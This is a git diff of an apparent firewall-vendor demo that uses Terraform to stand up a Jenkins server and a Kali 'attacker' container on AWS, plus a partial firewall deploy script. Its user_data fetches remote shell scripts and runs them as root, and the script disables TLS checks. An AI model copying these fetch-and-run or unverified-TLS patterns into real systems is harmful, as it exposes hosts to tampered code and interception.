diff --git a/aws/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml b/aws/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml
index 8d552e84..48a08a34 100644
--- a/aws/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml
+++ b/aws/Jenkins_proj-master/.pan-cnc/deploy/.meta-cnc.yaml
@@ -17,7 +17,7 @@ extends:
 
 # Labels allow grouping and type specific options and are generally only used in advanced cases
 labels:
-  collection: Jenkins Security Framework
+  collection: AWS Jenkins Security Framework
 
 # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
 # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
@@ -40,16 +40,40 @@ variables:
     type_hint: password
   - name: aws_region
     description: AWS Region
-    default: us-east-2
-    type_hint: text
+    type_hint: dropdown
+    dd_list:
+      - key: "us-west-1--- N.California"
+        value: "us-west-1"
+      - key: "us-west-2--- Oregon"
+        value: "us-west-2"
+      - key: "us-east-1--- N.Virginia"
+        value: "us-east-1"
+      - key: "us-east-2--- Ohio"
+        value: "us-east-2"
+      - key: "ca-central-1--- Canada Central"
+        value: "ca-central-1"
+      - key: "eu-west-1--- Ireland"
+        value: "eu-west-1"
+      - key: "eu-west-2--- London"
+        value: "eu-west-2"
+      - key: "eu-central-1--- Frankfurt"
+        value: "eu-central-1"
+      - key: "ap-east-1--- Hong Kong"
+        value: "ap-east-1"
+      - key: "ap-northeast-1--- Tokyo"
+        value: "ap-northeast-1"
+      - key: "ap-southeast-1--- Singapore"
+        value: "ap-southeast-1"
+      - key: "ap-southeast-2--- Sydney"
+        value: "ap-southeast-2"
+      - key: "ap-south-1--- Mumbai"
+        value: "ap-south-1"
+      - key: "sa-east-1--- Sao Paulo"
+        value: "sa-east-1"
   - name: aws_key_pair
     description: AWS Key Pair
     default: us-east-2-kp
     type_hint: text
-  - name: s3_bootstrap_bucket
-    description: S3 Bootstrap Bucket
-    default: unique_value
-    type_hint: text
 
 # Snippets is an ordered list of configuration xml fragments that will be pushed to the PAN-OS NGFW. The xpath
 # determines where in the configuration hierarchy the xml fragment will be set. 'file' indicates the name of the file
diff --git a/aws/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml b/aws/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml
index 294792be..e83fc4aa 100644
--- a/aws/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml
+++ b/aws/Jenkins_proj-master/.pan-cnc/destroy/.meta-cnc.yaml
@@ -15,7 +15,7 @@ extends:
 
 # Labels allow grouping and type specific options and are generally only used in advanced cases
 labels:
-  collection: Jenkins Security Framework
+  collection: AWS Jenkins Security Framework
 
 # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
 # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
diff --git a/aws/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml b/aws/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml
index a312b3aa..4cdb1e69 100644
--- a/aws/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml
+++ b/aws/Jenkins_proj-master/.pan-cnc/launch/.meta-cnc.yaml
@@ -17,7 +17,7 @@ extends:
 
 # Labels allow grouping and type specific options and are generally only used in advanced cases
 labels:
-  collection: Jenkins Security Framework
+  collection: AWS Jenkins Security Framework
 
 # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
 # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
diff --git a/aws/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml b/aws/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
index 04548635..f139a57b 100644
--- a/aws/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
+++ b/aws/Jenkins_proj-master/.pan-cnc/send/.meta-cnc.yaml
@@ -15,7 +15,7 @@ extends:
 
 # Labels allow grouping and type specific options and are generally only used in advanced cases
 labels:
-  collection: Jenkins Security Framework
+  collection: AWS Jenkins Security Framework
 
 # variables define the things an operator may customize in this skillet. Things like DNS servers, NTP addresses, etc
 # may be customized for each deployment. Each variable will be rendered as a form field in the panhandler application
diff --git a/aws/Jenkins_proj-master/WebInDeploy/aws_vars.tf b/aws/Jenkins_proj-master/WebInDeploy/aws_vars.tf
index 03887cc2..ebd01015 100644
--- a/aws/Jenkins_proj-master/WebInDeploy/aws_vars.tf
+++ b/aws/Jenkins_proj-master/WebInDeploy/aws_vars.tf
@@ -14,9 +14,6 @@ variable "FW1_Untrust_IP" {}
 
 variable "FW1_Trust_IP" {}
 variable "FW1_mgmt_IP" {}
-
-variable "bootstrap_s3bucket" {}
-
 variable "VPCName" {}
 variable "VPCCIDR" {}
 variable "ServerKeyName" {}
@@ -52,20 +49,20 @@ variable "kali" {
   type = "map"
 
   default = {
-    "us-east-1"      = "ami-092d0d014b7b31a08"
-    "us-east-2"      = "ami-0a444079f17309e2a"
-    "us-west-1"      = "ami-03e0ff3de0548396b"
-    "us-west-2"      = "ami-07c2e617785343806"
-    "eu-west-1"      = "ami-04bbe683cac096622"
-    "eu-west-2"      = "ami-05f478183aa65246f"
-    "ap-northeast-1" = "ami-0093e807f67a5f1e7"
-    "ap-northeast-2" = "ami-06ffd66e21c3ceb62"
-    "ap-southeast-1" = "ami-0e22510ff08cbb147"
-    "ap-southeast-2" = "ami-0d4437b6104e6b9bd"
-    "eu-central-1"   = "ami-08b17dda213f62471"
-    "sa-east-1"      = "ami-05cfb15d232b8be2a"
-    "ca-central-1"   = "ami-0e4c58a6a5ae9e417"
-    "ap-south-1"     = "ami-0b13a1e1e3db28939"
+    "us-west-1"      = "ami-0a3a5bb61a81e3135"
+    "us-west-2"      = "ami-000de76905d16b042"
+    "us-east-1"      = "ami-021d9d94f93a07a43"
+    "us-east-2"      = "ami-04239d579c52de263"
+    "ca-central-1"   = "ami-00ecb370195d6a225"
+    "eu-west-1"      = "ami-09e0dc5839aa7eca9"
+    "eu-west-2"      = "ami-0629d16d9e818369f"
+    "eu-central-1"   = "ami-0d30b058bf84b0a0c"
+    "ap-east-1"      = "ami-72661d03"
+    "ap-northeast-1" = "ami-0910fb379f9c0dda9"
+    "ap-southeast-1" = "ami-0dff5e99784353c4a"
+    "ap-southeast-2" = "ami-042ed6b729919aa24"
+    "ap-south-1"     = "ami-0f382fa26248923ea"
+    "sa-east-1"      = "ami-027c2142d479531cb"
   }
 }
 
@@ -74,19 +71,19 @@ variable "UbuntuRegionMap" {
 
   #Ubuntu Server 16.04 LTS (HVM)
   default = {
-    "us-east-1"      = "ami-092d0d014b7b31a08"
-    "us-east-2"      = "ami-0a444079f17309e2a"
-    "us-west-1"      = "ami-03e0ff3de0548396b"
-    "us-west-2"      = "ami-07c2e617785343806"
-    "eu-west-1"      = "ami-04bbe683cac096622"
-    "eu-west-2"      = "ami-05f478183aa65246f"
-    "ap-northeast-1" = "ami-0093e807f67a5f1e7"
-    "ap-northeast-2" = "ami-06ffd66e21c3ceb62"
-    "ap-southeast-1" = "ami-0e22510ff08cbb147"
-    "ap-southeast-2" = "ami-0d4437b6104e6b9bd"
-    "eu-central-1"   = "ami-08b17dda213f62471"
-    "sa-east-1"      = "ami-05cfb15d232b8be2a"
-    "ca-central-1"   = "ami-0e4c58a6a5ae9e417"
-    "ap-south-1"     = "ami-0b13a1e1e3db28939"
+    "us-west-1"      = "ami-0a3a5bb61a81e3135"
+    "us-west-2"      = "ami-000de76905d16b042"
+    "us-east-1"      = "ami-021d9d94f93a07a43"
+    "us-east-2"      = "ami-04239d579c52de263"
+    "ca-central-1"   = "ami-00ecb370195d6a225"
+    "eu-west-1"      = "ami-09e0dc5839aa7eca9"
+    "eu-west-2"      = "ami-0629d16d9e818369f"
+    "eu-central-1"   = "ami-0d30b058bf84b0a0c"
+    "ap-east-1"      = "ami-72661d03"
+    "ap-northeast-1" = "ami-0910fb379f9c0dda9"
+    "ap-southeast-1" = "ami-0dff5e99784353c4a"
+    "ap-southeast-2" = "ami-042ed6b729919aa24"
+    "ap-south-1"     = "ami-0f382fa26248923ea"
+    "sa-east-1"      = "ami-027c2142d479531cb"
   }
 }
diff --git a/aws/Jenkins_proj-master/WebInDeploy/bootstrap.tf b/aws/Jenkins_proj-master/WebInDeploy/bootstrap.tf
index a6d7cdef..411c7ff1 100644
--- a/aws/Jenkins_proj-master/WebInDeploy/bootstrap.tf
+++ b/aws/Jenkins_proj-master/WebInDeploy/bootstrap.tf
@@ -1,7 +1,18 @@
 # Create a BootStrap S3 Bucket
 
+resource "random_id" "bucket_prefix" {
+  byte_length = 4
+}
+
+#data "aws_s3_bucket" "jenkins" {
+#  bucket = "bootstrap_bucket"
+
+#region = "${var.aws_region}"
+#}
+
 resource "aws_s3_bucket" "bootstrap_bucket" {
-  bucket        = "${var.bootstrap_s3bucket}"
+  #bucket_prefix = "${var.bucket_prefix}"
+  bucket        = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}"
   acl           = "private"
   force_destroy = true
 
@@ -10,38 +21,42 @@ resource "aws_s3_bucket" "bootstrap_bucket" {
   }
 }
 
-# Create Folders and Upload Bootstrap Files
 resource "aws_s3_bucket_object" "bootstrap_xml" {
-  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
-  acl    = "private"
-  key    = "config/bootstrap.xml"
-  source = "bootstrap/bootstrap.xml"
+  depends_on = ["aws_s3_bucket.bootstrap_bucket"]
+  bucket     = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}"
+  acl        = "private"
+  key        = "config/bootstrap.xml"
+  source     = "bootstrap/bootstrap.xml"
 }
 
 resource "aws_s3_bucket_object" "init-cft_txt" {
-  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
-  acl    = "private"
-  key    = "config/init-cfg.txt"
-  source = "bootstrap/init-cfg.txt"
+  bucket     = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.bootstrap_bucket"]
+  acl        = "private"
+  key        = "config/init-cfg.txt"
+  source     = "bootstrap/init-cfg.txt"
 }
 
 resource "aws_s3_bucket_object" "software" {
-  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
-  acl    = "private"
-  key    = "software/"
-  source = "/dev/null"
+  bucket     = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.bootstrap_bucket"]
+  acl        = "private"
+  key        = "software/"
+  source     = "/dev/null"
 }
 
 resource "aws_s3_bucket_object" "license" {
-  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
-  acl    = "private"
-  key    = "license/"
-  source = "/dev/null"
+  bucket     = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.bootstrap_bucket"]
+  acl        = "private"
+  key        = "license/"
+  source     = "/dev/null"
 }
 
 resource "aws_s3_bucket_object" "content" {
-  bucket = "${aws_s3_bucket.bootstrap_bucket.id}"
-  acl    = "private"
-  key    = "content/"
-  source = "/dev/null"
+  bucket     = "sec-frame-jenkins-${lower(random_id.bucket_prefix.hex)}"
+  depends_on = ["aws_s3_bucket.bootstrap_bucket"]
+  acl        = "private"
+  key        = "content/"
+  source     = "/dev/null"
 }
diff --git a/aws/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml b/aws/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml
index adf9834a..e528f907 100644
--- a/aws/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml
+++ b/aws/Jenkins_proj-master/WebInDeploy/bootstrap/bootstrap.xml
@@ -741,13 +741,6 @@
                 </hourly>
               </recurring>
             </anti-virus>
-            <wildfire>
-              <recurring>
-                <every-min>
-                  <action>download-and-install</action>
-                </every-min>
-              </recurring>
-            </wildfire>
           </update-schedule>
         </system>
         <setting>
diff --git a/aws/Jenkins_proj-master/WebInDeploy/firewalls.tf b/aws/Jenkins_proj-master/WebInDeploy/firewalls.tf
index 4569fbf9..fda987d9 100644
--- a/aws/Jenkins_proj-master/WebInDeploy/firewalls.tf
+++ b/aws/Jenkins_proj-master/WebInDeploy/firewalls.tf
@@ -1,5 +1,17 @@
-resource "aws_iam_role" "JFFBootstrapRole" {
-  name = "JFFBootstrapRole"
+resource "random_id" "bootstraprole" {
+  byte_length = 3
+}
+
+resource "random_id" "bootstrappolicy" {
+  byte_length = 3
+}
+
+resource "random_id" "bootstrapinstanceprofile" {
+  byte_length = 3
+}
+
+resource "aws_iam_role" "jenkins-bootstraprole" {
+  name = "jenkins-bootstraprole-${random_id.bootstraprole.hex}"
 
   assume_role_policy = <<EOF
 {
@@ -17,9 +29,9 @@ resource "aws_iam_role" "JFFBootstrapRole" {
 EOF
 }
 
-resource "aws_iam_role_policy" "JFFBootstrapRolePolicy" {
-  name = "JFFBootstrapRolePolicy"
-  role = "${aws_iam_role.JFFBootstrapRole.id}"
+resource "aws_iam_role_policy" "jenkins-bootstrappolicy" {
+  name = "jenkins-bootstrappolicy${random_id.bootstrappolicy.hex}"
+  role = "${aws_iam_role.jenkins-bootstraprole.id}"
 
   policy = <<EOF
 {
@@ -28,21 +40,21 @@ resource "aws_iam_role_policy" "JFFBootstrapRolePolicy" {
     {
       "Effect": "Allow",
       "Action": "s3:ListBucket",
-      "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket}"
+      "Resource": "arn:aws:s3:::${aws_s3_bucket.bootstrap_bucket.bucket}"
     },
     {
     "Effect": "Allow",
     "Action": "s3:GetObject",
-    "Resource": "arn:aws:s3:::${var.bootstrap_s3bucket}/*"
+    "Resource": "arn:aws:s3:::${aws_s3_bucket.bootstrap_bucket.bucket}/*"
     }
   ]
 }
 EOF
 }
 
-resource "aws_iam_instance_profile" "JFFBootstrapInstanceProfile" {
-  name = "JFFBootstrapInstanceProfile"
-  role = "${aws_iam_role.JFFBootstrapRole.name}"
+resource "aws_iam_instance_profile" "jenkins-bootstrapinstanceprofile" {
+  name = "jenkins-bootstrapinstanceprofile${random_id.bootstrapinstanceprofile.hex}"
+  role = "${aws_iam_role.jenkins-bootstraprole.name}"
   path = "/"
 }
 
@@ -66,6 +78,7 @@ resource "aws_network_interface" "FW1-TRUST" {
   source_dest_check = false
   private_ips       = ["10.0.2.10"]
 }
+
 resource "aws_eip_association" "FW1-UNTRUST-Association" {
   network_interface_id = "${aws_network_interface.FW1-UNTRUST.id}"
   allocation_id        = "${aws_eip.FW1-PUB.id}"
@@ -85,7 +98,7 @@ resource "aws_instance" "PA-VM1" {
 
   disable_api_termination = false
 
-  iam_instance_profile = "${aws_iam_instance_profile.JFFBootstrapInstanceProfile.name}"
+  iam_instance_profile = "${aws_iam_instance_profile.jenkins-bootstrapinstanceprofile.name}"
   ebs_optimized        = true
   ami                  = "${var.PANFWRegionMap[var.aws_region]}"
   instance_type        = "m4.xlarge"
@@ -115,5 +128,5 @@ resource "aws_instance" "PA-VM1" {
     network_interface_id = "${aws_network_interface.FW1-TRUST.id}"
   }
 
-  user_data = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", var.bootstrap_s3bucket)))}"
+  user_data = "${base64encode(join("", list("vmseries-bootstrap-aws-s3bucket=", "${aws_s3_bucket.bootstrap_bucket.bucket}")))}"
 }
diff --git a/aws/Jenkins_proj-master/WebInDeploy/kali-instance.tf b/aws/Jenkins_proj-master/WebInDeploy/kali-instance.tf
index 12b70a70..8507aeee 100644
--- a/aws/Jenkins_proj-master/WebInDeploy/kali-instance.tf
+++ b/aws/Jenkins_proj-master/WebInDeploy/kali-instance.tf
@@ -28,18 +28,10 @@ resource "aws_instance" "kali" {
 
   user_data = "${base64encode(join("", list(
       "#! /bin/bash\n",
-          "sudo su\n",
-          "apt-get update\n",
-          "apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes\n",
-          "pip3 install docker-compose\n",
-          "cd /var/tmp\n",
-          "wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/.temp/Dockerfile\n",
-          "wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/.temp/docker-compose.yml\n",
-          "wget https://github.com/wwce/terraform/blob/master/aws/Jenkins_proj-master/attacker/run.sh\n",
-          "wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/attacker/auto-sploit.sh\n",
-          "wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/exp-server.py\n",
-          "docker-compose build\n",
-          "docker-compose up -d\n"
+             "sudo cd /var/tmp\n",
+             "sudo wget -O initialize_attacker.sh https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh\n",
+             "sudo chmod 755 initialize_attacker.sh &&\n",
+             "sudo bash ./initialize_attacker.sh\n"
     )))
    }"
 }
diff --git a/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh b/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh
new file mode 100644
index 00000000..33d75503
--- /dev/null
+++ b/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh
@@ -0,0 +1,14 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo "  attacker:" >> docker-compose.yml
+echo "    image: pglynn/kali:latest" >> docker-compose.yml
+echo "    ports:" >> docker-compose.yml
+echo "      - \"443:443\"" >> docker-compose.yml
+echo "      - \"5000:5000\"" >> docker-compose.yml
+docker-compose up -d
diff --git a/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh b/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh
new file mode 100644
index 00000000..bb37c3e5
--- /dev/null
+++ b/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo "  jenkins:" >> docker-compose.yml
+echo "    image: pglynn/jenkins:latest" >> docker-compose.yml
+echo "    environment:" >> docker-compose.yml
+echo "      JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
+echo "      JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
+echo "    ports:" >> docker-compose.yml
+echo "      - \"50000:50000\"" >> docker-compose.yml
+echo "      - \"8080:8080\"" >> docker-compose.yml
+docker-compose up -d
diff --git a/aws/Jenkins_proj-master/WebInDeploy/terraform.tfvars b/aws/Jenkins_proj-master/WebInDeploy/terraform.tfvars
index 8e91975f..08cc43f9 100644
--- a/aws/Jenkins_proj-master/WebInDeploy/terraform.tfvars
+++ b/aws/Jenkins_proj-master/WebInDeploy/terraform.tfvars
@@ -28,8 +28,6 @@ aws_region = "Region Here"
 
 ServerKeyName = "Keypair Here"
 
-bootstrap_s3bucket = "Unique S3 Bucketname"
-
 aws_access_key = "AWS Key"
 
 aws_secret_key = "AWS Secret Key"
diff --git a/aws/Jenkins_proj-master/WebInDeploy/webservers.tf b/aws/Jenkins_proj-master/WebInDeploy/webservers.tf
index b5beed04..09986a72 100644
--- a/aws/Jenkins_proj-master/WebInDeploy/webservers.tf
+++ b/aws/Jenkins_proj-master/WebInDeploy/webservers.tf
@@ -28,17 +28,10 @@ resource "aws_instance" "web1" {
 
   user_data = "${base64encode(join("", list(
    "#! /bin/bash\n",
-          "sudo su\n",
-          "apt-get update\n",
-          "apt-get update\n",
-          "apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes\n",
-          "pip3 install docker-compose\n",
-          "cd /var/tmp\n",
-          "wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/Dockerfile\n",
-          "wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/docker-compose.yml\n",
-          "wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/jenkins.sh\n",
-          "docker-compose build\n",
-          "docker-compose up -d\n"
+          "sudo cd /var/tmp\n",
+          "sudo wget -O initialize_webserver.sh https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh\n",
+          "sudo chmod 755 initialize_webserver.sh &&\n",
+          "sudo bash ./initialize_webserver.sh\n"
    )))
    }"
 }
diff --git a/aws/Jenkins_proj-master/attacker/Dockerfile b/aws/Jenkins_proj-master/attacker/Dockerfile
index 9a63391d..3f2f2072 100644
--- a/aws/Jenkins_proj-master/attacker/Dockerfile
+++ b/aws/Jenkins_proj-master/attacker/Dockerfile
@@ -39,4 +39,4 @@ ENTRYPOINT ["/bin/tini", "--"]
 ENV FLASK_APP=/root/exp-server.py
 
 # CMD ["/usr/local/bin/run.sh"]
-CMD ["flask run --host=0.0.0.0"]
+CMD ["flask", "run", "--host=0.0.0.0"]
diff --git a/aws/Jenkins_proj-master/attacker/docker-compose.yml b/aws/Jenkins_proj-master/attacker/docker-compose.yml
index 812bba77..02cdb71b 100644
--- a/aws/Jenkins_proj-master/attacker/docker-compose.yml
+++ b/aws/Jenkins_proj-master/attacker/docker-compose.yml
@@ -4,4 +4,5 @@ services:
     build: .
     container_name: attacker
     ports:
-      - "443:443"
\ No newline at end of file
+      - "443:443"
+      - "5000:5000"
diff --git a/aws/Jenkins_proj-master/deploy-v2.py b/aws/Jenkins_proj-master/deploy-v2.py
new file mode 100644
index 00000000..56763e3d
--- /dev/null
+++ b/aws/Jenkins_proj-master/deploy-v2.py
@@ -0,0 +1,674 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py -u <fwusername> -p<fwpassword> -r<resource group> -j<region>
+
+"""
+
+import argparse
+import json
+import logging
+import os
+import subprocess
+import sys
+import time
+import uuid
+import xml.etree.ElementTree as ET
+import xmltodict
+import requests
+import urllib3
+
+from azure.common import AzureException
+from azure.storage.file import FileService
+
+
+from pandevice import firewall
+from python_terraform import Terraform
+from collections import OrderedDict
+
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+_archive_dir = './WebInDeploy/bootstrap'
+_content_update_dir = './WebInDeploy/content_updates/'
+
+logging.basicConfig(level=logging.INFO)
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+# global var to keep status output
+status_output = dict()
+
+
+def send_request(call):
+
+    """
+    Handles sending requests to API
+    :param call: url
+    :return: Retruns result of call. Will return response for codes between 200 and 400.
+             If 200 response code is required check value in response
+    """
+    headers = {'Accept-Encoding' : 'None',
+               'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
+                              'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+    try:
+        r = requests.get(call, headers = headers, verify=False, timeout=5)
+        r.raise_for_status()
+    except requests.exceptions.HTTPError as errh:
+        '''
+        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response 
+        '''
+        logger.debug("DeployRequestException Http Error:")
+        raise DeployRequestException("Http Error:")
+    except requests.exceptions.ConnectionError as errc:
+        logger.debug("DeployRequestException Connection Error:")
+        raise DeployRequestException("Connection Error")
+    except requests.exceptions.Timeout as errt:
+        logger.debug("DeployRequestException Timeout Error:")
+        raise DeployRequestException("Timeout Error")
+    except requests.exceptions.RequestException as err:
+        logger.debug("DeployRequestException RequestException Error:")
+        raise DeployRequestException("Request Error")
+    else:
+        return r
+
+
+class DeployRequestException(Exception):
+    pass
+
+def walkdict(d, key):
+    """
+    Finds a key in a dict or nested dict and returns the value associated with it
+    :param d: dict or nested dict
+    :param key: key value
+    :return: value associated with key
+    """
+    stack = d.items()
+    while stack:
+        k, v = stack.pop()
+        if isinstance (v, OrderedDict):
+            stack.extend(v.iteritems())
+        else:
+            if k == key:
+                value = v
+                return value
+
+
+
+def update_fw(fwMgtIP, api_key):
+    """
+    Applies latest AppID, Threat and AV updates to firewall after launch
+    :param fwMgtIP: Firewall management IP
+    :param api_key: API key
+
+    """
+    # # Download latest applications and threats
+
+    type = "op"
+    cmd = "<request><content><upgrade><download><latest></latest></download></upgrade></content></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+    getjobid =0
+    jobid = ''
+    key ='job'
+
+    # FIXME - Remove Duplicate code for parsing jobid
+
+    while getjobid == 0:
+        try:
+            r = send_request(call)
+            logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    jobid = walkdict(dict, key)
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+    # FIXME - Remove Duplicate code for showing job status
+
+    completed = 0
+    while (completed == 0):
+        time.sleep(30)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+        try:
+            r = send_request(call)
+            logger.info('Got Response {} to show jobs '.format(r.text))
+        except:
+            DeployRequestException
+            logger.debug("failed to get jobid this time.  Try again")
+        else:
+            tree = ET.fromstring(r.text)
+            if tree.attrib['status'] == 'success':
+                try:
+                    if (tree[0][0][5].text == 'FIN'):
+                        logger.debug("APP+TP download Complete " )
+                        completed = 1
+                    print("Download latest Applications and Threats update")
+                    status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
+                        tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+                except:
+                    logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+            else:
+                logger.info('Unable to determine job status')
+
+
+    # install latest anti-virus update without committing
+    getjobid =0
+    jobid = ''
+    key ='job'
+    while getjobid == 0:
+        try:
+
+            type = "op"
+            cmd = "<request><anti-virus><upgrade><install><version>latest</version><commit>no</commit></install></upgrade></anti-virus></request>"
+            call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+            r = send_request(call)
+            logger.info('Got response to request AV install {}'.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    for found in listRecursive(dict, 'job'):
+                        jobid = found
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+        completed = 0
+        while (completed == 0):
+            time.sleep(30)
+            call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (
+                fwMgtIP, jobid, api_key)
+            r = send_request(call)
+            tree = ET.fromstring(r.text)
+
+            logger.debug('Got response for show job {}'.format(r.text))
+            if tree.attrib['status'] == 'success':
+                try:
+                    if (tree[0][0][5].text == 'FIN'):
+                        logger.debug("AV install Status Complete ")
+                        completed = 1
+                    else:
+                        status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+                        print('{0}\r'.format(status))
+                except:
+                    logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+
+            else:
+                logger.info('Unable to determine job status')
+
+
+def getApiKey(hostname, username, password):
+
+    """
+    Generates a Paloaltonetworks api key from username and password credentials
+    :param hostname: Ip address of firewall
+    :param username:
+    :param password:
+    :return: api_key API key for firewall
+    """
+
+
+    call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password)
+
+    api_key = ""
+    while True:
+        try:
+            # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read()
+            response = send_request(call)
+
+
+        except DeployRequestException as updateerr:
+            logger.info("No response from FW. Wait 20 secs before retry")
+            time.sleep(10)
+            continue
+
+        else:
+            api_key = ET.XML(response.content)[0][0].text
+            logger.info("FW Management plane is Responding so checking if Dataplane is ready")
+            logger.debug("Response to get_api is {}".format(response))
+            return api_key
+
+
+def getFirewallStatus(fwIP, api_key):
+    fwip = fwIP
+
+    """
+    Gets the firewall status by sending the API request show chassis status.
+    :param fwMgtIP:  IP Address of firewall interface to be probed
+    :param api_key:  Panos API key
+    """
+
